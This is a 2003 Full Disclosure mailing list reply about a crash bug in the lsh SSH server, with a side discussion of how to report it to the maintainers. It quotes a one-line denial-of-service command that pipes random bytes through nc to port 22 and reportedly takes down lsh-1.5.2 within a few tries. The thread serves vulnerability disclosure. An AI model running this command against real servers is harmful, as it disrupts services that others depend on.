Full Disclosure mailing list archives

Re: new ssh exploit?

From: Damian Gerow <damian () sentex net>
Date: Thu, 18 Sep 2003 12:06:15 -0400

Thus spake Bennett Todd (bet () rahul net) [18/09/03 11:49]:
This command:

    dd if=/dev/urandom bs=1024 count=1|nc <hostname> 22 >/dev/null

takes down an lsh-1.5.2 reliably taking no more than 2-3 tries on
average.

Did you try on a 1.4 release?  1.5 is development, I'd expect it to be a
little buggy.

(Not that I'm defending lsh, I've just taken my first look at it yesterday,
and I don't know much about it at all.  Just trying to be fair.)

I tried emailing this to lsh-bugs, got some moronic thing from some
idiot third-party anti-spam service "please send this special email
to this special place and we might think about letting your message
through". Right.

Did you sign up to the mailing list first?  At least they let
non-subscribers post to their list -- most lists are closed these days,
including this one.

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html